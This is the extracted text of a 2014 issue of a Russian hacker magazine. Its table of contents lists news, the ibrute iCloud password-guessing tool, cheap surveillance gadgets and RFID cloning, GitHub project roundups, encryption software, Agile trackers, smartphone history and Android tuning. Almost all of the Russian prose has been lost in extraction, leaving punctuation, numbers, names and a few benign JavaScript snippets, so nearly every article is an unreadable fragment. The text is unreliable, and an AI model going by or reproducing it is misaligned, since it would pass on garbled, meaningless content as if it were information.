Вы находитесь на странице: 1из 144

16+

189

Cover Story

JSONP

Rosetta Flash
. 68

Android

. 46

,
, ,



Python
. 92

. 14

. 72

10 (189)

: 02.10.2014



rusanen@real.xakep.ru



chernova@real.xakep.ru



PC ZONE, , UNITS
ilembitov@real.xakep.ru

ant

ant@real.xakep.ru


UNIXOID SYN/ACK
kruglov@real.xakep.ru

goltsev@real.xakep.ru


X-MOBILE
execbit.ru

rusanen@real.xakep.ru

Dr. Klouniz

MALWARE,
alexander@real.xakep.ru

. ,
, ,
-
.
, , ,
100 .
, -
,
. . ,
, , ,
sensitive- . , , .
. .
, . -
Agile/Scrum, Android
root , OS X iOS. JSONP time-based ,
- Python Native Client .
.
, ibrute ,
iCloud .
C++,
C++.
, . , . .

DVD

ant

ant@real.xakep.ru

D1g1

Security-
evdokimovds@gmail.com


PR-
yakovleva.a@glc.ru



samsonenko@glc.ru


shop.glc.ru, info@glc.ru, (495) 663-82-77, (800) 200-3999 ( , , )

(lapina@glc.ru)
: , 109147, / 50

: claim@glc.ru. : 115280, , . , . 19, . : : 606400, ., -, . , .,


. 13. : , 614111, , . , . , . 26.
, (), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101
Kouvola, . 96 500 . 360 .
. . , , .
. : content@glc.ru. , , 2014

Stay tuned, stay ][!


,
][
@IlyaRusanen

16+

2014

189

004 MEGANEWS
012 IBRUTE, ,
014 100$ , , ,
028 GO, GITHUB, GO!
030 CyberSafe
034 Agile
040 20
046 Android, root
051 , Mac OS X
056 EASY HACK
060
066 SDLC
068 JSONP Rosetta Flash
072
080 X-TOOLS C
082 20
088 ][-: ON DEMAND
092 Python
096 C++ Native Client
100 Windows Phone, Baidu Yi, Ubuntu Touch, Tizen, WebOS, FirefoxOS
107 : Mail.Ru Group
110

++. ,

116

11

122 , OpenLMI
128 , Packer development- production-
132 MySQL
137 PICASO 3D DESIGNER 3D-
140 FAQ
144 WWW2 -

MEGANEWS

Apple Watch
--

Mifrill
mifrill@real.xakep.ru

APPLE

- Apple
,
,
.
, , .
,
, . 38 42
: Apple Watch ( ), Apple Watch Sport ( ) Apple
Watch Edition ( ). 18 . (Retina,
) ,
, . Apple Watch .
, Apple
iPhone 5 . .
Apple Watch Siri
. Emoji.
. -


Watch, , Twitter ( ). Apple Watch
, 349 .
, Apple iPhone 6.
, iPhone 6 iPhone
6 Plus, . iPhone 6 4,7 (1334 750), iPhone 6 Plus
5,5 (1920 1080),
, , :). 6,8 7,1 ( iPhone 5S 7,6 ).
64- A8.
, 13%
7, 20% .
50%. iPhone 6 32 , iPhone 6 Plus
37 .

iPhone 6
,
- ;
16,
64 128 .

, APPLE
IPHONE 5 .
,

10 /189/ 2014

,

UBUNTU ,

Ubuntu. , 2013
, , - Ubuntu , -

.
, . Ubuntu ,
. ( ,
, Ubuntu ). , , , ,
, .
( Ubuntu 14.04.1 , ), : Ubuntu
. , , , ,
.

,
-



open
source.

GOOGLE
YAHOO
PHP

,
-, IT-.
Yahoo,
. ,
2015 Yahoo Mail
PGP, . ,

.
Gmail .
, , End-to-End , Google PGP Gmail.
, . , Wall Street Journal
,
, .

, ( )
, ,
Yahoo.
,
! , Yahoo, , , .

, Linux
.
,
.
.

LINUX

MEGANEWS

10 /189/ 2014

GOOGLE
WIKIPEDIA

,
,
. , ,
, ,
, . ,
, ,
.
, . , , , Google 50 Wikipedia.
, , Wikimedia
Foundation . 50 - ,
, . , , , .
Google , . Google . .

,

Google
120
,


.

6%

-


2014 ,
13,4%
.
, , 6%.
, 5%.


2,2% 68,6%
.

4727

Wall Street Journal,


OpenSSL Foundation 2000 .
. . ,
- OpenSSL write-only, - ,
VMS 16- Windows.
-

Chrome

48 332 Chrome ,
10%
, 130
.
-, .

HTTP
4xx.
.

10 /189/ 2014

FACEBOOK
, ?


, Facebook . ,

,
-
.

Facebook Messenger . ,
Facebook Messenger Apple App Store
, : .
, ,
.
,
,
Facebook . , . Wired.

, . ,
, :
, Facebook, ,
.
, , .

, , ,

Facebook Messenger
,

App Annie. ,


.
, , -
Facebook
.

, ,
.
? . ,
- . ,
, , . , Facebook ,
.
, . ,
,
Facebook.

- .
, . , Facebook ,
70%.
, Facebook -
, .
.
? . , , , Facebook
.




,
.

?
Black Hat 2014 : 127 ( )
, , ,
. , Black
Hat , ?

86%

88%

?
:

51%

29%
/

99%

19%

1%

, ,
,

MEGANEWS

10 /189/ 2014



MICROSOFT
CEO ?

, ,
- Microsoft . ,
, Microsoft , 34 .
58- ? , . ,
LA Clippers
NBA.
. ,
CEO Microsoft ... .
, . ,
1980 .
2015
.
, STRAMGT588: Leading
organizations.
Microsoft 2007 .

BITTORRENT- TRIBLER

, BitTorrent-
uTorrent. ,
, . - uTorrent ,
, Tribler.
Tribler,
BitTorrent-, .
Tribler, , ,
, . , Tribler (6.3.1)
, Tor.
, Tribler . Tribler. , 100%- ,
Tor, IP-
.
- , -
50 . , ,
.

ANDROID,

18 796

, Google

43%

Open Signal Android-,


: ,
. 18 796 .

Android-
Samsung

11 868


Samsung

3997

47,5%

20,9%
91%

Android KitKat

iOS- iOS 7

10 /189/ 2014

,
HTTPS,

Google.


HTTPS

.

,


Bugzilla,

97 .

Google Gmail,

, Unicode
Consortium.
(, o
).

, , , , , . , IT - , :).
, ,
Gmail 5
, . Bitcoin Security, (forum.btcsec.
com/index.php?/topic/9426-gmail-meniai-parol/) ( ). , 60%
- .
, .
1 261 809
..
Infosliv Bitcoin Security, . , Google, , ,
85% , . ,
, .
.
. Gmail . Mail.Ru.
4 664 478 . : forum.btcsec.com/index.php?/topic/9403-mail-vnimanie-meniaiparol/, , , Mail.Ru. -
Mail.Ru , 95% 4,5-
, .

Microsoft
Reddit AmA , IE Ultron,
,
.
Microsoft .



252 301
:

qwerty

32 776
:

123456789
16 538
:

111111

3761
:

1234

Dropbox .
? ,
Dropbox Pro
99 ( 9,99 ).
1 . ,
: 99 130 ,
Dropbox
.

10

MEGANEWS


- , ,

?
Nokia
.
, ,

.
.

,
.

.
.
,
. :


. ,
.

10 /189/ 2014

1323


Twitter
Twitter
. ,
8,5% ( 23 )
,

-
.
.
,
, 5% (13,5 ). ,
271 .

354,5

...
:
. ,

,
.

. .
.
,
pop-up




2014
1,3
, ,

. 60
, 145
, 77%
.

: 65
.

11

10 /189/ 2014

GOOGLE NASA

,
, AMAZON

Amazon , , Google NASA .


, , NASA.
,
,
, .
NASA. , .
, 120150
.
, .
,
, . ,
, . , ,
. , ,
. ,
.
NASA , , Google
. , Google
X (Project Wing),
. ,
.
, , .
(). The Atlantic, .
Google X , ,
.

Google Street View


. Amplifon

Street View
-,
.
.
Amazon
( )
. ,



,
.

.

270 ,
. ,
@Mail.ru, , 350
.

Twitter ,

.
hackerone.com/
twitter. 140 ,
.

Opera Software
2014 ,

38% 100 .
Opera
9,5
6,1 .

12

Header

10 /189/ 2014

IBRUTE,


, Hackapp
@hackappcom

,


iCloud. ,

. ,
, ,
.
, -
.
,
.

ibrute,

10 /189/ 2014

defcon. ,

. (j.mp/1tXnenm),

Keychain iCloud.
,
iCloud, ,
. , , ,
Apple , .
, , iTunes
App Store ,
Apple ID (, , iPhone 5s, , -
).

,
. , , ,
,
Apple.
.
, ,
. ,
-, :
1. .
2. .
3. .

-,
, IMAP, - API , , ,
IMAP ?
Apple. c icloud.com
iTunes Apple ID , API,
Find My iPhone,
. SSL MITM . ibrute.

,
.
rockyou.
com, 500 , iCloud.

GitHub (github.com/hackappcom/ibrute) .
. -
4chan .
GitHub
, -

Reddit. .
Apple , , , -, ,
.
The Next Web (j.mp/tnw-ibrute), , ibrute
.
.
Mashable (j.mp/mb-ibrute).
...
, , ,
. ,
, 1 .
,
, IT, The Daily Telegraph, Washington Post Forbes.
,
, FBI, ,
18
. - ,

. .

,
... Apple, , , .
,
Android, ,
.
ibrute , , , , -
,
iCloud . ,
,
ibrute
. Apple,
-
.
, Apple.
, .
, Apple .
, Apple , ,
, , . Apple . , Apple
.

:
1. Apple iCloud?
2. Apple bug bounty?
3. ? ;)

13

14

Cover Story

10 /189/ 2014


aka Pankov404
pankov404@gmail.com
@pankov404


aka Pingman

100 $
,
, ,
, RFID

,
,
. ,
.

10 /189/ 2014

15

100 $


, , .
:
. , . . ,
, ,
,
.
. . , . .
. ,
, , , ,
.
. , . ,
.
. : , , .
. , . , - ,
.




-.
,
.
.
(bit.ly/1kAs316),
. ,
. .
, ,
,
. , ,
,
.
308+, , ,
: GSM, Wi-Fi ,
.
, :

, ,
, .
( -

), .
,

. ,
, 100%- , ,
.
.
, ,
(, , )
.
1

. 1. CC308+

Cover Story

16

10 /189/ 2014

. 2.

.

16
. 100 ,
. ,
, .
, , ,

, , ,
.
:

. -
,
-
3
, ,
.

- , (. 2).
, , :
, , ,
.

,
, .
, ,
. : . , ,

. ,
.

. , ,
Wi-Fi, GSM .
GSM
. :
.
, . , ,
.

( ,
:). . .)
.
,

. ,
,
, , ,
.

,
. ,

,
( ?),
. ,

. 3.

10 /189/ 2014

100 $

. , ,
, ,
.
.

,
. ,
,
.


. -
, , ,
, .
:
.
, WARNING

, .
,
,
,
, , ,

,


,
. ,
.
.
,

,
, ,


- .
. ,
.
(



,
,
). ,
. , ,
, -.
.

MD80
,
,
.
.

, AAA, , ,
, .
,
,
. , ,
, . , ,
-
,
(. 3) .
, ,
, , , .
. ,
,
, ,
.
, .
, , , ,
, - -.
.
, USB-, AA
mini USB. ,

17

18

Cover Story

. 4. MD80 AAA
. 5.

10 /189/ 2014

.
,
. ,
( ), , .
, , , .

-
-
. , :).
,
, ,
.
,

. .

, ,
.
microSD, .
, , ,
. , , .
,

-

:


,
. .
,
( ).
;).

!

WARNING


,
,

.
.

.


, .
,
,
: ,
, .
, , .
(,
, ),
.

19

100 $

10 /189/ 2014


, , , ,
.
,
, .

,

, . ,
,
,
. .
,
.

,
ISO 27001.

. .
, , .
( )
, . , ,
.
,
.

- 30
(. . 6).
,
:
.

, -
, . , , ,
.
,
.
, ,
, .
, , -

:


,
,
?
, :)

, ( :
).
,
, , , ,

, . (
)

.
, ;)
.
: ,


.

. 6.
6

Cover Story

20

10 /189/ 2014

. 7.

. 8.

, , ,
. , ,
,
,
.
.

, , -
. -,
,
, . , ,
, ,
. , . , , , 25 .

, , (. 7), ,
.
,
,
, (. 8).
,
,
. . , ,
, ,
. -,
-: , . -
,
. ,
, .
. , , . ,
.
,
, ,
,

- ,
. ,
. -,
-

,
, , INFO
, ,
. . , ,


. -
17
. ,
.
, .
.
,

.
(. 9).

21

100 $

10 /189/ 2014

, ,

.

-
-, - .
, , ; - ,
.
. ,
,
-.
.
, , - . ,
,
. , ,
- 40% (, ).
,
-.
,
, .
40% , .
, : ,
, .
,
, .
, -
. (,
, ,
.
9

. 9.

, :). .
.). .


, .
, -
.
,
. ,
.
, - ,
. ,
, ,
. . ,
.
, .
, ,
.

,
.
,
, .

,
,
. , ,
, , - , - .

,
,
.
, . ,
.
10

. 10.

22

Cover Story

10 /189/ 2014

, ,
, ,
.
.
, . , : ,
.
,
, -, , , ;

, ,
(
. ), ,

,
.
- , :

,

-
,
.
.
308+

,

, ,


, ,

. ,


, .
(BIT.LY/1SB0LT1)
,

,
, .

308+:

.
.
, ,
, ,

,
11


. , .
,
.
:
1. .
2. .

. 308+
2,5 , , .
. ,
mini jack 2,5,
816
,
, , .
. , . 11.
. 11.

10 /189/ 2014

23

100 $

12

. 12.

,
, .
. , , ,
(
), (
). ,
,
, . .

.
:
.
, ,
.
: Press
and hold to play and repeat message, release
to stop.
,
. MP3- ,

. , ,
: , .
, ,
,
.
, ,
, ,
.
, ,

13


, .
, :
, , .

,
, .

.
7 , -


MP3
,

. 13.

Cover Story

24

14

. 14.

, .
. -, .
308+,
, ,
.
, ,
.

, , .
, ,

.
. . 14
, ,
.

,
,

.
,
,
,

.



. ,
,
,



.
,


,
. , ? ,
, ,
,
300400 .
40- , ,
.
,

, .
,
! , . ?
,
, ,
,
. , :).

10 /189/ 2014

25

100 $

10 /189/ 2014

RFID.

-, ,

, RFID.
RFID . RFID ,
.
RFID- 125 .

24 (. 15).
:
read write, , . 15

16

. 15 . 16. RFID-


.
:

. ,
, , -

RFID-

DEF CON (bit.ly/1p4v3I9),
RFID- ,
- RFID-.
, - .
.
, ,
17
,

,
Wi-Fi,

,
. ,

.

. 17.

. ,
, -
(
, :)).
,
AAA
- ,

.

, , ,
.
RFID 20 . HID-
,

Cover Story

26

18

19

-.
, Windows Linux.
,
. .
,
. , ,

. , ,
, . ,
, .
, , . ,

.
,
,
. ,
. , RFID- , , ,
.
(
,
). , ,

10 /189/ 2014

. 18. RFID-
. 19. RFID-
. 20. RFID-


.
, , , , ,

, , ,
.
, . , .
20

10 /189/ 2014

27

100 $


RFID .
,
. , , , , , , .
. 21 21
, HID-,
-.
, ,

: ,
, ,
. , ,

: ,
,
, ,
,
, . ,
,

,
- ,

,
. -

,
, ,

. , , , ,
.

,

21

. 21. C

. ,
- . - , , . ,
. , ,
, . . , . ,
. ,
, , , . - .

28

PC ZONE

10 /189/ 2014

GO, GITHUB, GO!


,
,
. GitHub
, .
, .


@ilya_pestov


rusanen@real.xakep.ru


Gogs
https://github.com/gogits/gogs
5
GitHub?
Git-
. Gogs
open source Bitbucket GitHub,
, Go.
:
;
;
SSH/HTTP(S);
SMTP / LDAP / reverse proxy ;

;
:
create/mirror/delete/watch/rename/transfer
public/private repository;

Migrate Migrate API


GitHub;
Issue tracker;
-;
MySQL, PostgreSQL SQLite 3;
GitHub, Google, QQ, Weibo.


Gogs GitLab,
, Ruby.
, GitLab . GitHub
13 3 .
: Bell,
AT&T, IBM, Qualcomm, NASDAQ OMX, Red Hat,
Alibaba.com . GitLab ,
Go .

Timesheet.js
https://github.com/semu/timesheet.js

, . Timesheet.js
. dist/timesheet.js
dist/timesheet.css,
:

<div id="timesheet"></div>
<br>
new Timesheet('timesheet', 2002, 2013, [
['2002', '09/2002', 'A freaking awesome time', 'lorem'],
['06/2002', '09/2003', 'Some great memories', 'ipsum'],
['2003', 'Had very bad luck'],
['10/2003', '2006', 'At least had fun', 'dolor'],
['02/2005', '05/2006', 'Enjoyed those times as well', 'ipsum'],
['07/2005', '09/2005', 'Bad luck again', 'default'],
['10/2005', '2008', 'For a long time nothing happened', 'dolor'],
['01/2008', '05/2009', 'LOST Season #4', 'lorem'],
['01/2009', '05/2009', 'LOST Season #4', 'lorem'],
['02/2010', '05/2010', 'LOST Season #5', 'lorem'],
['09/2008', '06/2010', 'FRINGE #1 & #2', 'ipsum']
]);

GitLab
-
iPhone, Android, Chrome .
. , , ,
Gogs .
Gogs , , (gobuild.io).

Accessible HTML5 Video


Player
https://github.com/paypal/accessible-html5video-player/
PayPal,
, .
, WebVTT. 18 , 5 .

10 /189/ 2014

29

Go, GitHub, go!

Tracking.js
https://github.com/eduardolundgren/tracking.js
( 7 ),
. Tracking.js , , , -.
,
, .
:

window.onload = function() {
var img = document.
getElementById('img');
var tracker = new tracking.
ObjectTracker('face');
tracking.track(img, tracker);
tracker.on('track', function(event) {
event.data.forEach(function(rect) {
plotRectangle(rect.x, rect.y,

rect.width, rect.height);
});
});
var friends = ['Thomas Middleditch',
'Martin Starr', 'Zach Woods' ];
var plotRectangle = function(x, y,
w, h) {
var rect = document.
createElement('div');
var arrow = document.
createElement('div');
var input = document.
createElement('input');
input.value = friends.pop();
rect.onclick = function name() {
input.select();
};
arrow.classList.add('arrow');
rect.classList.add('rect');
rect.appendChild(input);

rect.appendChild(arrow);
document.getElementById('photo').
appendChild(rect);
rect.style.width = w + 'px';
rect.style.height = h + 'px';
rect.style.left = (img.offsetLeft
+ x) + 'px';
rect.style.top = (img.offsetTop
+ y) + 'px';
};
};

The best of awesomeness and usefulness for web developers


https://github.com/Pestov/best-of-awesomeness-and-usefulness-for-webdev
: , , , ,
, . , ,
, , , . ,
. , ,
, , , .

Duo

Scraper

Heatmap.js

https://github.com/duojs/duo
, Component, Browserify
Go. , Duo
c ,
pull.
Duo .
, , duo-gulp,
Gulp-
Duo.

https://github.com/ruipgil/scraperjs
Scraper, , - JavaScript.
:
. API,
, . , HackerNews:

https://github.com/pa7/heatmap.js

.
UI/UX- .
Heatmap.js
API. ,
.
Gmaps, Leaflet Openlayers.

//index.js
var uid = require('matthewmueller/uid');
var fmt = require('yields/fmt');
var msg = fmt('Your unique ID is %s!',
uid());
window.alert(msg);
:

$ duo index.js > build.js

var scraperjs = require('scraperjs');


scraperjs.StaticScraper.create
('https://news.ycombinator.com/')
.scrape(function($) {
return $(".title a").
map(function() {
return $(this).text();
}).get();
}, function(news) {
console.log(news);
})

var heatmap = h337.create({


container: domElement
});
heatmap.setData({
max: 5,
data: [{ x: 10, y: 15, value: 5}, ...]
});

30

PC ZONE

10 /189/ 2014

CYBERSAFE


dhsilabs@gmail.com

10 /189/ 2014

31

FI

. .
AES 256 , Blowfish
448, Blowfish , .

TrueCrypt ( , , ) .

CyberSafe Top Secret.

Sashkin@shutterstock.com

Free, Advanced,
Professional, Ultimate Enterprise.
CyberSafe DES (
AES Blowfish , ),
. ,
//,

, .
( 64
) .
cybersafesoft.com/cstopsecret.zip,

( ), , DES
.
, ,
Professional. Advanced,
Professional , (4096
2048 Advanced). 16 ,
AES, 256 .
, ,
Ultimate. 20 ,
, 8192 ,
Blowfish 448 .
Ultimate .
Enterprise. (- ,
), ( , Ultimate), .
Ultimate: Blowfish 448 ,
8192 , .
, .


. -,
Windows XP/2003/Vista/7/8.
XP ,

.
-, , .

32

PC ZONE

10 /189/ 2014

-, CyberSoft CA (. 1). ,
CyberSafe

. , -
, , , , .
,
? :)

. 1.

. 2.

. 3.
. 4.


,
, . . 2

. 5.


.
,
. / .
,
.
. (!) .
.
.
.

10 /189/ 2014

33

. .
.
, .
,
XP.
BitLocker, 75 Pro- . ,
BitLocker. , BitLocker, TrueCrypt Top
Secret 2 .
.
Windows XP TrueCrypt.
. :
( ), ,
.
TrueCrypt , . . , : truecrypt.sourceforge.net.
TrueCrypt.
, CyberSafe Top Secret.
, ,
.
(. 3) . (. 4).
,

.
,
( 100 ),
(. 5).
, (. 6). ,
. ..
(. 7) , (. 8).
,
(. 9). , , , , -

INFO



cybersafesoft.
com/rus/.

. 6.

R R
R

TrueCrypt,
, CyberSafe
Top Secret 2. AES .
- , TrueCrypt
, CyberSafe Top Secret 2 ,
. ,
.
: https://subversion.assembla.com/svn/
cybersafe-encryption-library/.

(NtKernel, AlfaFile),
. ,
.
,
TrueCrypt? BitLocker,
, ,
.
TrueCrypt
, -
.

. , ,
, .

,
.. ,
.
,
.

. 7.

. 8.

. 9.

CyberSafe Top Secret 2 TrueCrypt. ,


-
. . ,
, .
, , ,
.

R F
I :
DR ID
.

Android.
CyberSafe Mobile. , CyberSafe Mobile,
CyberSafe Top Secret, .
: https://play.google.com/store/
apps/details?id=com.cybersafesoft.cybersafe.mobile.

PC ZONE

10 /189/ 2014

Doggygraph@shutterstock.com

34


max.mosin@gmail.com

AGILE


(: Redmine) , . ,
.

INFO

INFO

YouTrack
JetBrains, -.


Scrum
.

10 /189/ 2014

35

AGILE SCRUM?
Agile- , (
).
, :
;
;

;

.
, ,
.
Agile. Scrum.
Scrum , , , .
Scrum:
Product Backlog , ;
Sprint Backlog ,
;
Sprint , (
), ,
;
.
Scrum
(. 2), . , -, :
, ,
;
, ;
,
.

,

.

. 1. ,

Scrum
. 2. Scrum

- ?

,
, .
, , , , .

Redmine?

Redmine , . , , , , . ,
, . Scrum : , , ,
, c Git SVN .

?
, ,
.

: , , ,
, .
Git: Git SVN.
:
Scrum.
: , , , .
: ,
Redmine.
: .

.
.
email: , (Redmine ).
:
.
: .
: , .
: .

PC ZONE

36

10 /189/ 2014

:
JIRA Agile, Trello, Targetprocess, Assembla YouTrack JetBrains. 10- .

Assembla

:
Git:
: Web
: 7 ( 10), , 2/3
: 6 ( 10)
: 8 ( 10)
: 9 ( 10)
: 4 ( 10)
email:
:
:

:
: CSV, XML
: 8 ( 10)
: 30 49 , 50
99

Assembla

. : 19:30

. : , . , /
. Stand Up. .
. , . .
-, . ,
- , .

JIRA Agile
:
Git:
: Web
: 7 ( 10)
:
: 6 ( 10)
: 8 ( 10)
: 8 ( 10)
: 0 ( 10)
email:
:
:
: CSV, XML
: 6 ( 10)
: 25 600
, 50 1100

JIRA Agile

JIRA Agile


JIRA, JIRA Agile,
Scrum. . - .
. , . , , , YouTrack.
, . Assembla YouTrack .
: , . ,
, .

10 /189/ 2014

37

Trello
:
Git:
: Web
: 6 ( 10) ,
:
: 6 ( 10)
: 6 ( 10)
: 5 ( 10)
: 0 ( 10)
email:
:

:
: HTML
: 4 ( 10)
: 5

INFO
YouTrack



.

Trello

, , , : ,
, . . . , .
, , , , , , , , .
- , .
.
Trello

INFO
Scrum

1986
.

PC ZONE

38

10 /189/ 2014

YouTrack
:
Git: , TeamCity
: Web
: 8 ( 10)
:
: 8 ( 10)
: 8 ( 10)
: 9 ( 10)
: 8 ( 10)
email:
:
:
: CSV, HTML
: 9 ( 10)
: 25 500
, 50 750

YouTrack

YouTrack ,
. , ,

. ,

-,
. , , ,
, , ,
.

-,
. . 750 , -
,
,
YouTrack,
.

YouTrack

- .
Trello
,
. Targetprocess:
Trello, . , ,
,
, Targetprocess .
, , ,
.

YouTrack

JIRA Agile .
, ,
. ,
- , .
- ,
, , , , , , .
:
Assembla YouTrack. , . Assembla ,
, -

10 /189/ 2014

39

Targetprocess
:
Git:
: Web
: 8 ( 10)
:
: 6 ( 10)
: 6 ( 10)
: 4 ( 10)
: 0 ( 10)
email:
: ,

:
: CSV
: 5 ( 10)
: 25 ,
249

Targetprocess

Targetprocess

Targetprocess

, , . , ,
Trello, . , ,
. , . , -
, , , , . ,
, , ,
- , . Targetprocess .

. YouTrack . ,
, ,
. Assembla Git. YouTrack , TeamCity,
,
. Assembla Stand Up
, YouTrack.
, , ,
YouTrack. -
( ). Assembla , ,
, . ,
, , , . ,

. YouTrack - , , Assembla .
,
. , YouTrack ,
,
, . ,
,
,
, - ( , ).
,
YouTrack.

10 /189/ 2014

PopOnAir@shutterstock.com

40

10 /189/ 2014

41

20

iPhone :
. , , ,

.

IBM SIMON


apismenny@gmail.com

(1994)

1992 COMDEX
IBM,
. : Motorola StarTAC,
, , Palm Pilot
, Apple MessagePad 100,
Newton, , . -
NAND ( ) ,
. ,
iPhone, .
.
IBM Simon 3,3 160 293 .
1 ( Windows 95 4 . . . .),
16 . ,
DOS , . : , , , , .
Simon , . , :
,
,
, cc:Lotus -

NOKIA 9000 COMMUNICATOR

. PCMCIA, !
.
, , Simon, IBM .
1994 BellSouth
Simon 1100
1750 .
, Simon ,

,
Simon 900 , 600.
: 50 .
Simon ,

. Simon - , .
, .
,
, .

. ,
IBM .

(1996)

Nokia :
, , . Nokia 9000 Communicator.
IBM Simon , . Nokia 9000 - , Intel,
24 , 4 4 ,
. , , , 640 200 . , ,
, .
Nokia
GeOS.

GeOS Commodore Apple II.


: , , , , , HTML .
, , .

,
Nokia 9000 GSM.
,
.
Nokia 1998 9110
(33 ),
2001 Nokia 9210
Symbian OS.

42

ERICSSON GS 88 PENELOPE

10 /189/ 2014

1997


Ericsson c Sony-Ericsson,
Sony.
Ericsson
, . Ericsson

, .
1997 .
IBM Ericsson
. 1997
GS 88, Penelope.

ERICSSON R380

ERICSSON P800

,
,

QWERTY-
-- Nokia 9000.
: , GeOS. GS 88
WAP.

, Ericsson
: ,
.
, : GS
88 ,
.

(2000),
(2002)

Symbian
Nokia,
, Psion.
Symbian : Ericsson Motorola. Symbian
, GeOS Nokia
Ericsson.
Ericsson
Symbian. Ericsson R380,
. R380 , Nokia 9000: 164
26 397 38 Nokia. ,
, R380
. ,
- Graffiti Palm OS .
: , -, SMS, WAP, ,
, .
: HTML ( Nokia 9000 ) .
Ericsson : GSM
!
2002 , Sony
Ericsson P800, R380, -

Ericsson R380

Ericsson P800

, , . P800
32- , 16
640 480 .
Symbian 7.0 UIQ 2.0
.

10 /189/ 2014

43

20

QUALCOMM PDQ

(1999),
(2002)

KYOCERA 6035

(2001),

HANDSPRING TREO

Palm Treo , Palm


OS . , Palm
,
Palm .
Qualcomm, 1999 pdQ
800. Ericsson R380, , , Graffiti . , Palm OS
, .
Palm OS, GSM . 2000 Qualcomm
Kyocera, pdQ 800 Kyocera 6035.
2001 .
Palm OS Handspring, Treo. : Treo
180, 180g 270, Treo 300 CDMA. 180g
Palm, , .
Graffiti, . Treo 180 Graffiti
, Palm OS. , - , ,
. Treo 270 (700 400), . : Motorola Dragonball
33 16 .
2003 Palm Handspring - Treo.
2008 , Palm Treo Pro
Windows Mobile Palm OS. Palm : Palm Pre, webOS, HP.

BLACKBERRY 5810

(2002)

BlackBerry Research in Motion


. , Android. RIM , BlackBerry
. , PCMCIA
, ,
.
RIM, , BlackBerry 5810. 2002 : , QWERTY-, .
GPRS, BlackBerry, , .
Java. 5810 - ,
. , , , .
RIM : BlackBerry
, , , .

Qualcomm pdQ /
Kyocera 6035

Handspring Treo
180 270

44

DANGER HIPTOP

10 /189/ 2014

(2002)

Danger (
, ),
.
Danger Hiptop, T-Mobile Sidekick.
Danger
: , . BlackBerry ,
Hiptop . ,
. , , ,
, , , .
Hiptop ,
. ,
( Download Catalog),
. , Danger
, 2003 Android
Google.
Danger T-Mobile Hiptop 2008 , Microsoft. Danger
Kin, Hiptop
Microsoft. , : ,
, .

Palm
,

IPAQ H6315

(2004)

Windows Pocket PC . Palm ,



. ,
.
iPaq h6315 HP. Treo, BlackBerry:
,
,
, . : (200 .
. .), 64

, 240 320,
, SD , MP3, Wi-Fi 802.11b
GPS. , .
h6315 :
Windows Mobile,
(
), .
, , , .
,

Windows Mobile .
Palm Windows
Mobile , .

10 /189/ 2014

45

20

NEONODE N1M

(2005)



,
.

iPhone,
.



( !)
Neonode.
Neonode N1m
-
, : 88
52 21 , 94 .
176
220 , zForce.
; , ,
, , . zForce ,
.
Windows CE 5.0
. ,
SD . ,
, , N1m,
, :
. 2008 Neonode ,
zForce.

,
iPhone 2007 . Windows Mobile,
, , . WM,
BlackBerry, Symbian.

. 2007
, , 2008
HTC Dream G1 Android.
Windows Mobile Windows Phone, Palm
, Sony-Ericsson Ericsson, Nokia Microsoft.
- Tizen, Sailfish,
Ubuntu Firefox OS.
,
, , , .
iPhone 6 - ,
IBM Simon.

BlackBerry 5810

, ,
, ,

IBM Simon

iPhone 6

46

X-Mobile

10 /189/ 2014


ANDROID,
ROOT


rommanio@yandex.ru

: Droid- . root
-
, - . Google,
.

10 /189/ 2014

47

Google . Android , , ,
. , .

Android, .

Android
, root, .
,

,
.
. -
,
( , ).
.
, .
-,
, . -,
.
.
, . , ,
:
,
?
,
- .
Email Exchange
Gmail.
Google (, Google
Now).
Google Keep, Google+ Google.
, ()
. ,
, .
. .
(Samsung )
.
, Home Screen
. ,
100500 ,
?

. ,
,

48

X-Mobile

. ( ) , ,
.
-, API , , PowerManager
API,
. Samsung Galaxy Note 10.1 (,
Droid- )
DVFS Dynamic Voltage
and Frequency Scaling, ,
Samsung (
, ).
( ) , .
, , / .
:
,
(
).

. , , ,
. , ,
-.

10 /189/ 2014


INFO

.
setApplicationEnabled
Setting()
PackageManager,


COMPONENT_
ENABLED_STATE_
DISABLED_USER (
,
Android).


. , /
, ,
.
, Smart Launcher ,
TouchWiz. ,
, .
/.
: -
Busybox, PID (
'ps w') /proc/<PID>/status. , ,
Android
.

top.
, Process Explorer, , ,
?
, Google Play
, , , .
,
.
Play , (:

10 /189/ 2014

49

-, ),
.

(, , ). ,
, ( ,
, , ,
Google+ . . .). , ,
.



Android
(SD-) . ,
, . .
.nomedia . Android 4.0 , , ,
.
.nomedia.

. ,
,

.

Samsung
- ,
,
Home .
, S Voice
. ,
, .
. , ,
.
, Samsung
. , (Home screen settings)
(Transition effect)
(None).

HTC
HTC
. , , -

S Voice

50

X-Mobile

10 /189/ 2014

DR ID

Android.
, , , :
Google Maps RMaps. , .
Adobe Reader MuPDF.
. AlReader
FBReader.
Lighthing Browser, -
.
RSS- Feedly
FeedMe (, ).

HTC (Tell HTC)


.

Sony
Sony Xperia SP ,
. ,
Google Chrome: Chrome .

GREENIFY
Greenify ( ) ,
, . -,
( ,
). , , .
, forceStopPackage(), Greenify ,
, root. -root- killBackgroundProcesses(),
,
, Greenify.

INFO



(Bluetooth, Wi-Fi,
GSM...).

Android
. root
,
. , :
Low Memory Killer
,
. , . : Auto
Memory Manager MinFree.
/system/app
/system/priv-app.
root.
Bloatware Freezer,
Autostarts.
Zram,
TCP westwood. .

.

-root Greenify
.
Accessibility Service, ,
Android. , , , Greenify ,
.

ART
Android 4.4 Dalvik ART, Android Runtime.
AOT-. , ART, .
, Android,
Java - ,
. - ,
Java- . ,
.
. Android 2.2 Dalvik JIT-.
, . KitKat ART,
.
, . , , , .
, 50%,
( ,
).
ART .
,
.
, . .
( HITB) ,

DEX- (dex2oat) . ,
ART, user-mode-. , boot.oat,
, (0x700000),
ASLR.
- OAT- , .
. , OAT- ELF, , , GDB.
... .
ART
Google ( Dalvik, , ).
,
Dalvik , Google . ( )
ART KitKat,
.


Android,
/
. , . :
,
, .

10 /189/ 2014

51

,
MAC OS X

Mopic@shutterstock.com


androidstreet.net

X-Mobile

52

10 /189/ 2014

, Apple iOS. ,
iOS Mac OS X. , Mac OS X POSIX- Darwin, ,
IT, , Darwin XNU, Mach FreeBSD. ,
, iOS .
MAC OS X
,
( ) ,
1988 , IT ,
-
NeXTSTEP. NeXTSTEP . Apple
NeXT, .
NeXTSTEP ,
. Mach, FreeBSD, . NeXTSTEP
Objective-C API.
( OS X iOS)
,
.
NeXT Apple 1997 NeXTSTEP
Rhapsody, Mac OS 9. 2000 Rhapsody
